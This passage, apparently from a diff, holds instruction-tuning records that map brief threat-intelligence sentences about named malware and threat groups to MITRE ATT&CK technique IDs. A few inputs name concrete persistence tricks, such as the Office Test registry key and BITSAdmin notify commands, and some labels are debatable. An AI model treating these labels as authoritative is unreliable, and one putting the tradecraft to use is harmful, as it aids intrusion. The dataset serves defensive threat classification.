+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Okrum can impersonate a logged-on user's security context using a call to the ImpersonateLoggedOnUser API.", + "output": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Pupy can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.", + "output": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SILENTTRINITY can find a process owned by a specific user and impersonate the associated token.", + "output": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Shamoon can impersonate tokens using \"\"LogonUser\"\", \"\"ImpersonateLoggedOnUser\"\", and \"\"ImpersonateNamedPipeClient\"\".\"", + "output": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Siloscape impersonates the main thread of \"\"CExecSvc.exe\"\" by calling \"\"NtImpersonateThread\"\".\"", + "output": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Lazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call \"\"CreateProcessAsUserA\"\" under that user's context.\"", + "output": "- T1134.002: Access Token Manipulation - Create Process with Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PipeMon can attempt to gain administrative privileges using token impersonation.", + "output": "- T1134.002: Access Token Manipulation - Create Process with Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PoshC2 can use Invoke-RunAs to make tokens.", + "output": "- T1134.002: Access Token Manipulation - Create Process with Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "ZxShell has a command called RunAs, which creates a new process as another user or process context.", + "output": "- T1134.002: Access Token Manipulation - Create Process with Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike can make tokens from known credentials.", + "output": "- T1134.003: Access Token Manipulation - Make and Impersonate Token" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cobalt Strike can spawn processes with alternate PPIDs.", + "output": "- T1134.004: Access Token Manipulation - Parent PID Spoofing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "KONNI has used parent PID spoofing to spawn a new `cmd` process using `CreateProcessW` and a handle to `Taskmgr.exe`.", + "output": "- T1134.004: Access Token Manipulation - Parent PID Spoofing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Indrik Spider used \"\"wmic.exe\"\" to add a new user to the system.\"", + "output": "- T1136: Create Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"APT3 has been known to create or enable accounts, such as \"\"support_388945a0\"\".\"", + "output": "- T1136.001: Create Account - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT41 created user accounts and adds them to the User and Admin groups.", + "output": "- T1136.001: Create Account - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly 2.0 created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.", + "output": "- T1136.001: Create Account - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Flame can create backdoor accounts with login \u201cHelpAssistant\u201d on domain connected systems if appropriate rights are available.", + "output": "- T1136.001: Create Account - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Hildegard has created a user named \u201cmonerodaemon\u201d.", + "output": "- T1136.001: Create Account - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TeamTNT has created local privileged users on victim machines.", + "output": "- T1136.001: Create Account - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PsExec has the ability to remotely create accounts on target systems.", + "output": "- T1136.002: Create Account - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The \"\"net user username \\password \\domain\"\" commands in Net can be used to create a domain account.\"", + "output": "- T1136.002: Create Account - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT32 have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.", + "output": "- T1137: Office Application Startup" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Gamaredon Group has inserted malicious macros into existing documents, providing persistence when they are reopened. Gamaredon Group has loaded the group's previously delivered VBA project by relaunching Microsoft Outlook with the \"\"/altvba\"\" option, once the Application.Startup event is received.\"", + "output": "- T1137: Office Application Startup" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ruler can be used to automate the abuse of Outlook Rules, Forms, and Home Pages to establish persistence.", + "output": "- T1137: Office Application Startup" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BackConfig has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.", + "output": "- T1137.001: Office Application Startup - Office Template Macros" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"APT28 has used the Office Test persistence mechanism within Microsoft Office by adding the Registry key \"\"HKCU\\Software\\Microsoft\\Office test\\Special\\Perf\"\" to execute code.\"", + "output": "- T1137.002: Office Application Startup - Office Test" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OilRig has abused the Outlook Home Page feature for persistence. OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.", + "output": "- T1137.004: Office Application Startup - Outlook Home Page" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ruler can be used to automate the abuse of Outlook Home Pages to establish persistence.", + "output": "- T1137.004: Office Application Startup - Outlook Home Page" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Naikon has used the RoyalRoad exploit builder to drop a second stage loader, intel.wll, into the Word Startup folder on the compromised host.", + "output": "- T1137.006: Office Application Startup - Add-ins" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During Operation Dust Storm, attackers used VBS code to decode payloads.", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Proton uses an encrypted file to store commands and configuration values.", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ramsay can extract its agent from the body of a malicious document.", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Volatile Cedar has targeted publicly facing web servers, with both automatic and manual vulnerability discovery.", + "output": "- T1190: Exploit Public-Facing Application" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Elderwood has targeted manufacturers in the supply chain for the defense industry.", + "output": "- T1195: Supply Chain Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NotPetya's initial infection vector for the June 27, 2017 compromise was a backdoor in the Ukrainian tax accounting software M.E.Doc.", + "output": "- T1195: Supply Chain Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"XCSSET adds malicious code to a host's Xcode projects by enumerating CocoaPods \"\"target_integrator.rb\"\" files under the \"\"/Library/Ruby/Gems\"\" folder or enumerates all \"\".xcodeproj\"\" folders under a given directory. XCSSET then downloads a script and Mach-O file into the Xcode project folder.\"", + "output": "- T1195.001: Supply Chain Compromise - Compromise Software Dependencies and Development Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 gained initial network access to some victims via a trojanized update of SolarWinds Orion software.", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Dragonfly has placed trojanized installers for control system software on legitimate vendor app stores.", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GOLD SOUTHFIELD has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gelsemium has compromised software supply chains to gain access to victims.", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GoldenSpy has been packaged with a legitimate tax preparation software.", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host.", + "output": "- T1197: BITS Jobs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BITSAdmin can be used to create BITS Jobs to launch a malicious process.", + "output": "- T1197: BITS Jobs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "UBoatRAT takes advantage of the /SetNotifyCmdLine option in BITSAdmin to ensure it stays running on a system to maintain persistence.", + "output": "- T1197: BITS Jobs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "LAPSUS$ has accessed internet-facing identity providers such as Azure Active Directory and Okta to target specific organizations.", + "output": "- T1199: Trusted Relationship" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Lazarus Group persistence mechanisms have used \"\"forfiles.exe\"\" to execute .htm files.\"", + "output": "- T1202: Indirect Command Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).", + "output": "- T1203: Exploitation for Client Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Magic Hound has attempted to get users to execute malware via social media and spearphishing emails.", + "output": "- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link.", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Earth Lusca has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + 